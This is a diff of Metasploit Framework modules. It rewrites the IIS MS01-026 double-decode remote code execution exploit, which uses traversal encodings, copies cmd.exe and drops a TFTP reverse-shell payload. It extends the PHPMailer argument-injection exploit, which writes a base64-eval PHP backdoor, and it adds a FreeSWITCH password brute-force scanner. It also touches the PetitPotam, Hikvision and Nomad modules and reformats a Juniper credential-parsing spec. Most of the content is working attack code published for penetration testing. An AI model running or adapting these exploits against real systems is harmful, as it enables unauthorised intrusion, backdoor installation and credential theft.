+        print_good('Server responded with ERROR_BAD_NETPATH which indicates that the attack was successful')
+      else
+        print_status("Server responded with #{e.status_code.name} (#{e.status_code.description})")
+      end
+    end
+  end
+end

modules/auxiliary/scanner/dcerpc/petitpotam.rb

@@ -66,8 +66,17 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run_host(_ip)
-    connect
-    smb_login
+    begin
+      connect
+    rescue Rex::ConnectionError => e
+      fail_with(Failure::Unreachable, e.message)
+    end
+
+    begin
+      smb_login
+    rescue Rex::Proto::SMB::Exceptions::Error, RubySMB::Error::RubySMBError => e
+      fail_with(Failure::NoAccess, "Unable to authenticate ([#{e.class}] #{e}).")
+    end
 
     handle_args = PIPE_HANDLES[datastore['PIPE'].to_sym]
     fail_with(Failure::BadConfig, "Invalid pipe: #{datastore['PIPE']}") unless handle_args

modules/auxiliary/scanner/misc/freeswitch_event_socket_login.rb

@@ -0,0 +1,117 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'metasploit/framework/credential_collection'
+require 'metasploit/framework/login_scanner/freeswitch_event_socket'
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::AuthBrute
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'FreeSWITCH Event Socket Login',
+        'Description' => %q{
+          This module tests FreeSWITCH Event Socket logins on a range of
+          machines and report successful attempts.
+        },
+        'Author' => [
+          'krastanoel'
+        ],
+        'References' => [
+          ['URL', 'https://freeswitch.org/confluence/display/FREESWITCH/mod_event_socket']
+        ],
+        'DefaultOptions' => { 'VERBOSE' => false },
+        'License' => MSF_LICENSE,
+        'Notes' => {
+          'Stability' => [CRASH_SERVICE_RESTARTS],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(8021),
+        OptString.new('PASSWORD', [false, 'FreeSWITCH event socket default password', 'ClueCon']),
+        OptPath.new('PASS_FILE',
+                    [
+                      false,
+                      'The file that contains a list of of probable passwords.',
+                      File.join(Msf::Config.install_root, 'data', 'wordlists', 'unix_passwords.txt')
+                    ])
+      ]
+    )
+
+    # freeswitch does not have an username, there's only password
+    deregister_options(
+      'DB_ALL_CREDS', 'DB_ALL_USERS', 'DB_SKIP_EXISTING', 'BLANK_PASSWORDS',
+      'USERNAME', 'USER_AS_PASS', 'USERPASS_FILE', 'USER_FILE',
+      'PASSWORD_SPRAY', 'STOP_ON_SUCCESS'
+    )
+  end
+
+  def run_host(ip)
+    cred_collection = Metasploit::Framework::PrivateCredentialCollection.new(
+      password: datastore['PASSWORD'],
+      pass_file: datastore['PASS_FILE']
+    )
+    cred_collection = prepend_db_passwords(cred_collection)
+
+    scanner = Metasploit::Framework::LoginScanner::FreeswitchEventSocket.new(
+      host: ip,
+      port: rport,
+      cred_details: cred_collection,
+      stop_on_success: true, # this will have no effect due to the scanner behaviour when scanning without username
+      connection_timeout: 10
+    )
+
+    scanner.scan! do |result|
+      credential_data = result.to_h
+      credential_data.merge!(
+        module_fullname: fullname,
+        workspace_id: myworkspace_id
+      )
+
+      if result.success?
+        credential_data.delete(:username) # This service uses no username
+        credential_core = create_credential(credential_data)
+        credential_data[:core] = credential_core
+        create_credential_login(credential_data)
+
+        if datastore['VERBOSE']
+          vprint_good("Login Successful: #{result.credential.private} (#{result.status}: #{result.proof&.strip})")
+        else
+          print_good("Login Successful: #{result.credential.private}")
+        end
+      else
+        invalidate_login(credential_data)
+        vprint_error("LOGIN FAILED: #{result.credential.private} (#{result.status}: #{result.proof&.strip})")
+      end
+    end
+  end
+
+  def check_host(_ip)
+    connect
+    banner = sock.get
+    disconnect(sock)
+
+    if banner.include?('Access Denied, go away.') || banner.include?('text/rude-rejection')
+      return Exploit::CheckCode::Safe('Access denied by network ACL')
+    end
+
+    unless banner.include?('Content-Type: auth/request')
+      return Exploit::CheckCode::Unknown('Unable to determine the service fingerprint')
+    end
+
+    return Exploit::CheckCode::Appears
+  end
+end

modules/exploits/linux/misc/hikvision_rtsp_bof.rb

@@ -29,7 +29,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'References'     =>
         [
           [ 'CVE', '2014-4880' ],
-          [ 'URL', 'https://www.rapid7.com/blog/post/2014/11/19/r7-2014-18-hikvision-dvr-devices--multiple-vulnerabilities' ]
+          [ 'URL', 'https://www.rapid7.com/blog/post/2014/11/19/r7-2014-18-hikvision-dvr-devices-multiple-vulnerabilities' ]
         ],
       'Platform'       => 'linux',
       'Arch'           => ARCH_ARMLE,

modules/exploits/multi/http/phpmailer_arg_injection.rb

@@ -60,7 +60,10 @@ class MetasploitModule < Msf::Exploit::Remote
       ])
     register_advanced_options(
       [
-        OptInt.new('WAIT_TIMEOUT', [true, 'Seconds to wait to trigger the payload', 300])
+        OptInt.new('WAIT_TIMEOUT', [true, 'Seconds to wait to trigger the payload', 300]),
+        OptString.new('NameField', [true, 'Name of the element for the Name field', 'name'], regex: /^([^\t\n\f \/>"'=]+)$/),
+        OptString.new('EmailField', [true, 'Name of the element for the Email field', 'email'], regex: /^([^\t\n\f \/>"'=]+)$/),
+        OptString.new('MessageField', [true, 'Name of the element for the Message field', 'message'], regex: /^([^\t\n\f \/>"'=]+)$/)
       ])
   end
 
@@ -98,6 +101,9 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
+    name_field = datastore['NameField']
+    email_field = datastore['EmailField']
+    message_field = datastore['MessageField']
     payload_file_name = "#{rand_text_alphanumeric(8)}.php"
     payload_file_path = "#{datastore['WEB_ROOT']}/#{payload_file_name}"
 
@@ -111,9 +117,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
     data = Rex::MIME::Message.new
     data.add_part('submit', nil, nil, 'form-data; name="action"')
-    data.add_part("<?php eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}')); ?>", nil, nil, 'form-data; name="name"')
-    data.add_part(email, nil, nil, 'form-data; name="email"')
-    data.add_part("#{rand_text_alphanumeric(2 + rand(20))}", nil, nil, 'form-data; name="message"')
+    data.add_part("<?php eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}')); ?>", nil, nil, "form-data; name='#{name_field}'")
+    data.add_part(email, nil, nil, "form-data; name='#{email_field}'")
+    data.add_part("#{rand_text_alphanumeric(2 + rand(20))}", nil, nil, "form-data; name='#{message_field}'")
 
     print_status("Writing the backdoor to #{payload_file_path}")
     res = send_request_cgi(

modules/exploits/multi/misc/nomad_exec.rb

@@ -52,8 +52,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'DisclosureDate' => '2021-05-17',
         'Notes' => {
           'Stability' => [CRASH_SAFE],
-          'Reliability' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
-          'SideEffects' => [REPEATABLE_SESSION]
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION]
         }
       )
     )

modules/exploits/windows/iis/ms01_026_dbldecode.rb

@@ -2,15 +2,13 @@
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
-require 'rex/exploitation'
 
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
-  # NOTE: This cannot be an HttpClient module since the response from the server
-  # is not a valid HttpResponse
-  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager
+  include Msf::Exploit::FileDropper
 
   def initialize(info = {})
     super(
@@ -21,7 +19,16 @@ class MetasploitModule < Msf::Exploit::Remote
           This module will execute an arbitrary payload on a Microsoft IIS installation
           that is vulnerable to the CGI double-decode vulnerability of 2001.
 
-          NOTE: This module will leave a metasploit payload in the IIS scripts directory.
+          This module has been tested successfully on:
+
+          Windows 2000 Professional (SP0) (EN);
+          Windows 2000 Professional (SP1) (AR);
+          Windows 2000 Professional (SP1) (CZ);
+          Windows 2000 Server (SP0) (FR);
+          Windows 2000 Server (SP1) (EN); and
+          Windows 2000 Server (SP1) (SE).
+
+          Note: This module will leave a Metasploit payload exe in the IIS scripts directory.
         },
         'Author' => [ 'jduck' ],
         'License' => MSF_LICENSE,
@@ -34,27 +41,41 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'Platform' => 'win',
         'Targets' => [
-          [ 'Automatic', {} ]
+          [
+            'Windows (Dropper)',
+            {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X86],
+              'DefaultOptions' => { 'PAYLOAD' => 'windows/shell/reverse_tcp' },
+              'Type' => :win_dropper
+            }
+          ],
+          [
+            'Windows (Command)',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/generic' },
+              'Type' => :win_command
+            }
+          ]
         ],
         'CmdStagerFlavor' => 'tftp',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ]
+        },
         'DefaultTarget' => 0,
-        'DisclosureDate' => '2001-05-15',
-        'Compat' => {
-          'Meterpreter' => {
-            'Commands' => %w[
-              stdapi_fs_delete_file
-              stdapi_sys_process_execute
-            ]
-          }
-        }
+        'DisclosureDate' => '2001-05-15'
       )
     )
 
     register_options(
       [
         Opt::RPORT(80),
-        OptString.new('WINDIR', [ false, 'The windows directory of the target host', nil ]),
-        OptString.new('CMD', [ false, 'Execute this command instead of using command stager', nil ])
+        OptString.new('WINDIR', [ false, 'The Windows directory name of the target host', nil ]),
+        OptInt.new('DEPTH', [ true, 'Traversal depth to reach the drive root', 2 ])
       ]
     )
 
@@ -62,181 +83,126 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def dotdotslash
-    possibilities = [
-      "..%255c",
-      "..%%35c",
-      "..%%35%63",
-      "..%25%35%63",
-      ".%252e/",
-      "%252e./",
-      "%%32%65./",
-      ".%%32%65/",
-      ".%25%32%65/",
-      "%25%32%65./"
-    ]
-    possibilities[rand(possibilities.length)]
+    [
+      '..%255c',
+      '..%%35c',
+      '..%%35%63',
+      '..%25%35%63',
+      '.%252e/',
+      '%252e./',
+      '%%32%65./',
+      '.%%32%65/',
+      '.%25%32%65/',
+      '%25%32%65./'
+    ].sample
   end
 
-  def mini_http_request(opts, timeout = 5)
-    connect
-    req = ''
-    req << opts['method']
-    req << ' '
-    req << opts['uri']
-    req << ' '
-    req << "HTTP/1.0\r\n"
-    req << "Host: #{datastore['RHOST']}\r\n"
-    req << "\r\n"
-    sock.put(req)
+  # Detect the correct Windows directory name.
+  # Unfortunately, the IIS scripts directory must
+  # be located on the same drive as %SystemRoot%.
+  def detect_windows_directory
+    win_dirs = %w[winnt windows]
+    matches = [
+      'Directory of',
+      '\\inetpub\\',
+      "\\scripts\r\n"
+    ]
 
-    # This isn't exactly awesome, but it seems to work..
-    begin
-      headers = sock.get_once(-1, timeout) || ''
-      body = sock.get_once(-1, timeout) || ''
-    rescue ::EOFError
-      # nothing
+    win_dirs.each do |dir|
+      res = execute_command('dir', windir: dir)
+      next unless res
+      next unless res.code == 200
+      next unless res.body
+
+      matches.each do |m|
+        return dir if res.body.to_s.include?(m)
+      end
     end
 
-    disconnect
-    [headers, body]
-  end
-
-  def detect_windows_dir()
-    win_dirs = [ 'winnt', 'windows' ]
-    win_dirs.each { |dir|
-      res = execute_command("dir", { :windir => dir })
-      if (res.kind_of?(Array))
-        body = res[1]
-        if (body and body =~ /Directory of /)
-          return dir
-        end
-      end
-    }
-    return nil
+    nil
   end
 
   def check
-    @win_dir = detect_windows_dir()
-    if @win_dir
-      return Exploit::CheckCode::Vulnerable
-    end
-
-    Exploit::CheckCode::Safe
+    win_dir = detect_windows_directory
+    win_dir ? CheckCode::Vulnerable("Found Windows directory name: #{win_dir}") : CheckCode::Safe
   end
 
-  #
-  # NOTE: the command executes regardless of whether or not
-  # a valid response is returned...
-  #
   def execute_command(cmd, opts = {})
-    # Don't try the start command...
-    # Using the "start" method doesn't seem to make iis very happy :(
-    return [nil, nil] if cmd =~ /^start [a-zA-Z]+\.exe$/
+    # Don't run the start command...
+    # We'll execute the payload via IIS later.
+    # Using the "start" method doesn't seem to make IIS very happy :(
+    return if cmd.start_with?('start') && cmd.include?('.exe')
 
-    print_status("Executing command: #{cmd} (options: #{opts.inspect})")
-
-    uri = '/scripts/'
-    exe = opts[:cgifname]
-    if (not exe)
-      uri << dotdotslash
-      uri << dotdotslash
-      uri << (opts[:windir] || @win_dir)
-      uri << '/system32/cmd.exe'
+    vprint_status("Executing command: #{cmd}")
+    if opts[:cgifname]
+      cmd_path = opts[:cgifname]
     else
-      uri << exe
+      cmd_path = ''
+      datastore['DEPTH'].times { cmd_path << dotdotslash }
+      cmd_path << (opts[:windir] || @win_dir)
+      cmd_path << '/system32/cmd.exe'
     end
-    uri << '?/x+/c+'
-    uri << Rex::Text.uri_encode(cmd)
+    uri = "/scripts/#{cmd_path}?/x+/c+#{Rex::Text.uri_encode(cmd)}"
+    send_request_cgi({ 'uri' => uri }, 20)
+  end
 
-    vprint_status("Attempting to execute: #{uri}")
-
-    mini_http_request({
-      'uri' => uri,
-      'method' => 'GET',
-    }, 20)
+  def copy_cmd_exe_to_scripts_directory
+    fname = "#{rand_text_alphanumeric(4..7)}.exe"
+    print_status("Copying \"\\#{@win_dir}\\system32\\cmd.exe\" to the IIS scripts directory as \"#{fname}\"...")
+    res = execute_command("copy \\#{@win_dir}\\system32\\cmd.exe #{fname}")
+    fail_with(Failure::Unknown, 'No reply from server') unless res
+    fname
   end
 
   def exploit
-    @win_dir = datastore['WINDIR']
-    if not @win_dir
-      # try to detect the windows directory
-      @win_dir = detect_windows_dir()
-      if not @win_dir
-        fail_with(Failure::NoTarget, "Unable to detect the target host windows directory (maybe not vulnerable)!")
-      end
-    end
-    print_status("Using windows directory \"#{@win_dir}\"")
+    @win_dir = datastore['WINDIR'] || detect_windows_directory
 
-    # now copy the file
-    exe_fname = rand_text_alphanumeric(4 + rand(4)) + ".exe"
-    print_status("Copying cmd.exe to the web root as \"#{exe_fname}\"...")
-    # NOTE: this assumes %SystemRoot% on the same drive as the web scripts directory
-    # Unfortunately, using %SystemRoot% doesn't seem to work :(
-    res = execute_command("copy \\#{@win_dir}\\system32\\cmd.exe #{exe_fname}")
+    fail_with(Failure::NotVulnerable, 'Unable to detect the target host Windows directory (maybe not vulnerable)!') unless @win_dir
 
-    if (datastore['CMD'])
-      res = execute_command(datastore['CMD'], { :cgifname => exe_fname })
-      if (res[0])
-        print_status("Command output:\n" + res[0])
+    print_status("Using Windows directory \"#{@win_dir}\"")
+
+    @cmd_exe_fname = copy_cmd_exe_to_scripts_directory
+
+    case target['Type']
+    when :win_command
+      res = execute_command(payload.encoded, cgifname: @cmd_exe_fname)
+
+      if res && res.body
+        cmd_res = res.code == 200 ? res.body : res.body.to_s.scan(%r{<pre>(.*?)</pre>}m).flatten.first.to_s
+        if cmd_res.strip.blank?
+          print_status('Command returned no output')
+        else
+          print_good('Command output:')
+          print_line(cmd_res)
+        end
       else
-        print_error("No output received")
+        print_error('No reply')
       end
+    when :win_dropper
+      tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+      execute_cmdstager(
+        temp: '.',
+        linemax: 1_400,
+        cgifname: @cmd_exe_fname,
+        tftphost: tftphost,
+        # Force noconcat so we can skip the "start" command in execute_command method
+        noconcat: true,
+        # We can't delete the payload while it is running, so don't try
+        nodelete: true
+      )
 
-      res = execute_command("del #{exe_fname}")
-      return
+      exe_payload = stager_instance.payload_exe
+      register_file_for_cleanup(exe_payload)
+
+      print_status("Triggering payload \"#{exe_payload}\" via a direct request...")
+      send_request_cgi({ 'uri' => "/scripts/#{exe_payload}" }, 1)
     end
-
-    # Use the CMD stager to get a payload running
-    execute_cmdstager({ :temp => '.', :linemax => 1400, :cgifname => exe_fname })
-
-    # Save these file names for later deletion
-    @exe_cmd_copy = exe_fname
-    @exe_payload = stager_instance.payload_exe
-
-    # Just for good measure, we'll make a quick, direct request for the payload
-    # Using the "start" method doesn't seem to make iis very happy :(
-    print_status("Triggering the payload via a direct request...")
-    mini_http_request({ 'uri' => '/scripts/' + stager_instance.payload_exe, 'method' => 'GET' }, 1)
-
-    handler
   end
 
-  #
-  # The following handles deleting the copied cmd.exe and payload exe!
-  #
-  def on_new_session(client)
-    if client.type != "meterpreter"
-      print_error("NOTE: you must use a meterpreter payload in order to automatically cleanup.")
-      print_error("The copied exe and the payload exe must be removed manually.")
-      return
-    end
-
-    return if not @exe_cmd_copy
-
-    # stdapi must be loaded before we can use fs.file
-    client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
-
-    # Delete the copied CMD.exe
-    print_status("Deleting copy of CMD.exe \"#{@exe_cmd_copy}\" ...")
-    client.fs.file.rm(@exe_cmd_copy)
-
-    # Migrate so  that we can delete the payload exe
-    client.console.run_single("run migrate -f")
-
-    # Delete the payload exe
-    return if not @exe_payload
-
-    delete_me_too = "C:\\inetpub\\scripts\\" + @exe_payload
-
-    print_status("Changing permissions on #{delete_me_too} ...")
-    cmd = "C:\\#{@win_dir}\\system32\\attrib.exe -r -h -s " + delete_me_too
-    client.sys.process.execute(cmd, nil, { 'Hidden' => true })
-
-    print_warning("Deleting #{delete_me_too} ...")
-    begin
-      client.fs.file.rm(delete_me_too)
-    rescue ::Exception => e
-      print_error("Exception: #{e.inspect}")
-    end
+  # Remove the copied cmd.exe from the IIS scripts directory
+  def cleanup
+    execute_command("del #{@cmd_exe_fname}") if @cmd_exe_fname
+  ensure
+    super
   end
 end

spec/lib/msf/core/auxiliary/juniper_spec.rb

@@ -1,31 +1,36 @@
 # -*- coding: binary -*-
-require 'spec_helper'
 
+require 'spec_helper'
 
 RSpec.describe Msf::Auxiliary::Juniper do
   class DummyJuniperClass
     include Msf::Auxiliary::Juniper
     def framework
       Msf::Simple::Framework.create(
-          'ConfigDirectory' => Rails.root.join('spec', 'dummy', 'framework', 'config').to_s,
-          # don't load any module paths so we can just load the module under test and save time
-          'DeferModuleLoads' => true
+        'ConfigDirectory' => Rails.root.join('spec', 'dummy', 'framework', 'config').to_s,
+        # don't load any module paths so we can just load the module under test and save time
+        'DeferModuleLoads' => true
       )
     end
+
     def active_db?
       true
     end
-    def print_good(str=nil)
-      raise StandardError.new("This method needs to be stubbed.")
+
+    def print_good(_str = nil)
+      raise StandardError, 'This method needs to be stubbed.'
     end
-    def store_cred(hsh=nil)
-      raise StandardError.new("This method needs to be stubbed.")
+
+    def store_cred(_hsh = nil)
+      raise StandardError, 'This method needs to be stubbed.'
     end
+
     def fullname
-      "auxiliary/scanner/snmp/juniper_dummy"
+      'auxiliary/scanner/snmp/juniper_dummy'
     end
+
     def myworkspace
-      raise StandardError.new("This method needs to be stubbed.")
+      raise StandardError, 'This method needs to be stubbed.'
     end
   end
 
@@ -34,12 +39,11 @@ RSpec.describe Msf::Auxiliary::Juniper do
   let!(:workspace) { FactoryBot.create(:mdm_workspace) }
 
   context '#create_credential_and_login' do
-
     let(:session) { FactoryBot.create(:mdm_session) }
 
-    let(:task) { FactoryBot.create(:mdm_task, workspace: workspace)}
+    let(:task) { FactoryBot.create(:mdm_task, workspace: workspace) }
 
-    let(:user) { FactoryBot.create(:mdm_user)}
+    let(:user) { FactoryBot.create(:mdm_user) }
 
     subject(:test_object) { DummyJuniperClass.new }
 
@@ -47,7 +51,7 @@ RSpec.describe Msf::Auxiliary::Juniper do
     let(:service) { FactoryBot.create(:mdm_service, host: FactoryBot.create(:mdm_host, workspace: workspace)) }
     let(:task) { FactoryBot.create(:mdm_task, workspace: workspace) }
 
-    let(:login_data) {
+    let(:login_data) do
       {
         address: service.host.address,
         port: service.port,
@@ -63,12 +67,12 @@ RSpec.describe Msf::Auxiliary::Juniper do
         private_type: :nonreplayable_hash,
         status: Metasploit::Model::Login::Status::UNTRIED
       }
-    }
+    end
 
     it 'creates a Metasploit::Credential::Login' do
-      expect{test_object.create_credential_and_login(login_data)}.to change{Metasploit::Credential::Login.count}.by(1)
+      expect { test_object.create_credential_and_login(login_data) }.to change { Metasploit::Credential::Login.count }.by(1)
     end
-    it "associates the Metasploit::Credential::Core with a task if passed" do
+    it 'associates the Metasploit::Credential::Core with a task if passed' do
       login = test_object.create_credential_and_login(login_data.merge(task_id: task.id))
       expect(login.tasks).to include(task)
     end
@@ -81,164 +85,159 @@ RSpec.describe Msf::Auxiliary::Juniper do
 
     it 'deals with admin credentials' do
       expect(aux_juniper).to receive(:print_good).with('Admin user netscreen found with password hash nKVUM2rwMUzPcrkG5sWIHdCtqkAibn')
-      expect(aux_juniper).to receive(:report_host).with({:host => '127.0.0.1', :os_name => 'Juniper ScreenOS'})
+      expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper ScreenOS' })
       expect(aux_juniper).to receive(:create_credential_and_login).with(
         {
-          address: "127.0.0.1",
+          address: '127.0.0.1',
           port: 161,
-          protocol: "tcp",
+          protocol: 'tcp',
           workspace_id: workspace.id,
           origin_type: :service,
           service_name: '',
-          module_fullname: "auxiliary/scanner/snmp/juniper_dummy",
-          username: "netscreen",
-          private_data: "nKVUM2rwMUzPcrkG5sWIHdCtqkAibn",
+          module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
+          username: 'netscreen',
+          private_data: 'nKVUM2rwMUzPcrkG5sWIHdCtqkAibn',
           private_type: :nonreplayable_hash,
           status: Metasploit::Model::Login::Status::UNTRIED
         }
       )
-      aux_juniper.juniper_screenos_config_eater('127.0.0.1',161,
-        "set admin name \"netscreen\"\n" <<
-        "set admin password \"nKVUM2rwMUzPcrkG5sWIHdCtqkAibn\"\n")
+      aux_juniper.juniper_screenos_config_eater('127.0.0.1', 161,
+                                                "set admin name \"netscreen\"\n" <<
+                                                "set admin password \"nKVUM2rwMUzPcrkG5sWIHdCtqkAibn\"\n")
     end
 
     it 'deals with user account with password hash' do
       expect(aux_juniper).to receive(:print_good).with('User 1 named testuser found with password hash 02b0jt2gZGipCiIEgl4eainqZIKzjSNQYLIwE=. Enable permission: enable')
-      expect(aux_juniper).to receive(:report_host).with({:host => '127.0.0.1', :os_name => 'Juniper ScreenOS'})
-      expect(aux_juniper).to receive(:store_loot).with("juniper.netscreen.config", "text/plain", "127.0.0.1",
-          "set user \"testuser\" uid 1\n" <<
-          "set user \"testuser\" type auth\n" <<
-          "set user \"testuser\" hash-password \"02b0jt2gZGipCiIEgl4eainqZIKzjSNQYLIwE=\"\n" <<
-          "set user \"testuser\" enable",
-        "config.txt", "Juniper Netscreen Configuration"
-      )
+      expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper ScreenOS' })
+      expect(aux_juniper).to receive(:store_loot).with('juniper.netscreen.config', 'text/plain', '127.0.0.1',
+                                                       "set user \"testuser\" uid 1\n" <<
+                                                       "set user \"testuser\" type auth\n" <<
+                                                       "set user \"testuser\" hash-password \"02b0jt2gZGipCiIEgl4eainqZIKzjSNQYLIwE=\"\n" <<
+                                                       'set user "testuser" enable',
+                                                       'config.txt', 'Juniper Netscreen Configuration')
       expect(aux_juniper).to receive(:create_credential_and_login).with(
         {
-          address: "127.0.0.1",
+          address: '127.0.0.1',
           port: 1337,
-          protocol: "tcp",
+          protocol: 'tcp',
           workspace_id: workspace.id,
           origin_type: :service,
           service_name: '',
-          module_fullname: "auxiliary/scanner/snmp/juniper_dummy",
-          username: "testuser",
-          jtr_format: "sha1",
-          private_data: "02b0jt2gZGipCiIEgl4eainqZIKzjSNQYLIwE=",
+          module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
+          username: 'testuser',
+          jtr_format: 'sha1',
+          private_data: '02b0jt2gZGipCiIEgl4eainqZIKzjSNQYLIwE=',
           private_type: :nonreplayable_hash,
           status: Metasploit::Model::Login::Status::UNTRIED
         }
       )
 
-      aux_juniper.juniper_screenos_config_eater('127.0.0.1',1337,
-        "set user \"testuser\" uid 1\n" <<
-        "set user \"testuser\" type auth\n" <<
-        "set user \"testuser\" hash-password \"02b0jt2gZGipCiIEgl4eainqZIKzjSNQYLIwE=\"\n" <<
-        "set user \"testuser\" enable\n")
+      aux_juniper.juniper_screenos_config_eater('127.0.0.1', 1337,
+                                                "set user \"testuser\" uid 1\n" <<
+                                                "set user \"testuser\" type auth\n" <<
+                                                "set user \"testuser\" hash-password \"02b0jt2gZGipCiIEgl4eainqZIKzjSNQYLIwE=\"\n" <<
+                                                "set user \"testuser\" enable\n")
     end
 
     context 'deals with snmp-server community' do
-
       it 'with Read permission' do
         expect(aux_juniper).to receive(:print_good).with('SNMP community sales with permissions Read-Only')
-        expect(aux_juniper).to receive(:report_host).with({:host => '127.0.0.1', :os_name => 'Juniper ScreenOS'})
+        expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper ScreenOS' })
         expect(aux_juniper).to receive(:create_credential_and_login).with(
           {
-            address: "127.0.0.1",
+            address: '127.0.0.1',
             port: 161,
-            protocol: "udp",
+            protocol: 'udp',
             workspace_id: workspace.id,
             origin_type: :service,
             service_name: 'snmp',
-            module_fullname: "auxiliary/scanner/snmp/juniper_dummy",
-            private_data: "sales",
+            module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
+            private_data: 'sales',
             private_type: :password,
             status: Metasploit::Model::Login::Status::UNTRIED,
             access_level: 'RO'
           }
         )
-        aux_juniper.juniper_screenos_config_eater('127.0.0.1',1337,'set snmp community "sales" Read-Only Trap-on traffic version v1')
+        aux_juniper.juniper_screenos_config_eater('127.0.0.1', 1337, 'set snmp community "sales" Read-Only Trap-on traffic version v1')
       end
 
       it 'with Read-Write permission' do
         expect(aux_juniper).to receive(:print_good).with('SNMP community sales with permissions Read-Write')
-        expect(aux_juniper).to receive(:report_host).with({:host => '127.0.0.1', :os_name => 'Juniper ScreenOS'})
+        expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper ScreenOS' })
         expect(aux_juniper).to receive(:create_credential_and_login).with(
           {
-            address: "127.0.0.1",
+            address: '127.0.0.1',
             port: 161,
-            protocol: "udp",
+            protocol: 'udp',
             workspace_id: workspace.id,
             origin_type: :service,
             service_name: 'snmp',
-            module_fullname: "auxiliary/scanner/snmp/juniper_dummy",
-            private_data: "sales",
+            module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
+            private_data: 'sales',
             private_type: :password,
             status: Metasploit::Model::Login::Status::UNTRIED,
             access_level: 'RW'
           }
         )
-        aux_juniper.juniper_screenos_config_eater('127.0.0.1',1337,'set snmp community "sales" Read-Write Trap-on traffic version v1')
+        aux_juniper.juniper_screenos_config_eater('127.0.0.1', 1337, 'set snmp community "sales" Read-Write Trap-on traffic version v1')
       end
-
     end
 
     it 'deals with ppp configurations' do
       expect(aux_juniper).to receive(:print_good).with('PPTP Profile ISP with username username hash fzSzAn31N4Sbh/sukoCDLvhJEdn0DVK7vA== via pap')
-      expect(aux_juniper).to receive(:report_host).with({:host => '127.0.0.1', :os_name => 'Juniper ScreenOS'})
+      expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper ScreenOS' })
       expect(aux_juniper).to receive(:store_loot).with(
-        "juniper.netscreen.config", "text/plain", "127.0.0.1",
-          "setppp profile \"ISP\" auth type pap\n" <<
-          "setppp profile \"ISP\" auth local-name \"username\"\n" <<
-          "setppp profile \"ISP\" auth secret \"fzSzAn31N4Sbh/sukoCDLvhJEdn0DVK7vA==\"",
-        "config.txt", "Juniper Netscreen Configuration"
+        'juniper.netscreen.config', 'text/plain', '127.0.0.1',
+        "setppp profile \"ISP\" auth type pap\n" <<
+        "setppp profile \"ISP\" auth local-name \"username\"\n" <<
+        'setppp profile "ISP" auth secret "fzSzAn31N4Sbh/sukoCDLvhJEdn0DVK7vA=="',
+        'config.txt', 'Juniper Netscreen Configuration'
       )
       expect(aux_juniper).to receive(:create_credential_and_login).with(
         {
-          address: "127.0.0.1",
+          address: '127.0.0.1',
           port: 1723,
-          protocol: "tcp",
+          protocol: 'tcp',
           workspace_id: workspace.id,
           origin_type: :service,
           service_name: 'pptp',
-          module_fullname: "auxiliary/scanner/snmp/juniper_dummy",
-          username: "username",
-          private_data: "fzSzAn31N4Sbh/sukoCDLvhJEdn0DVK7vA==",
+          module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
+          username: 'username',
+          private_data: 'fzSzAn31N4Sbh/sukoCDLvhJEdn0DVK7vA==',
           private_type: :nonreplayable_hash,
           status: Metasploit::Model::Login::Status::UNTRIED
         }
       )
-      aux_juniper.juniper_screenos_config_eater('127.0.0.1',1337,
-        "setppp profile \"ISP\" auth type pap\n" <<
-        "setppp profile \"ISP\" auth local-name \"username\"\n" <<
-        "setppp profile \"ISP\" auth secret \"fzSzAn31N4Sbh/sukoCDLvhJEdn0DVK7vA==\"\n"
-      )
+      aux_juniper.juniper_screenos_config_eater('127.0.0.1', 1337,
+                                                "setppp profile \"ISP\" auth type pap\n" <<
+                                                "setppp profile \"ISP\" auth local-name \"username\"\n" <<
+                                                "setppp profile \"ISP\" auth secret \"fzSzAn31N4Sbh/sukoCDLvhJEdn0DVK7vA==\"\n")
     end
 
     it 'deals with ike configurations' do
       expect(aux_juniper).to receive(:print_good).with('IKE Profile To-Cisco to 2.2.2.1 with password netscreen via pre-g2-des-sha')
-      expect(aux_juniper).to receive(:report_host).with({:host => '127.0.0.1', :os_name => 'Juniper ScreenOS'})
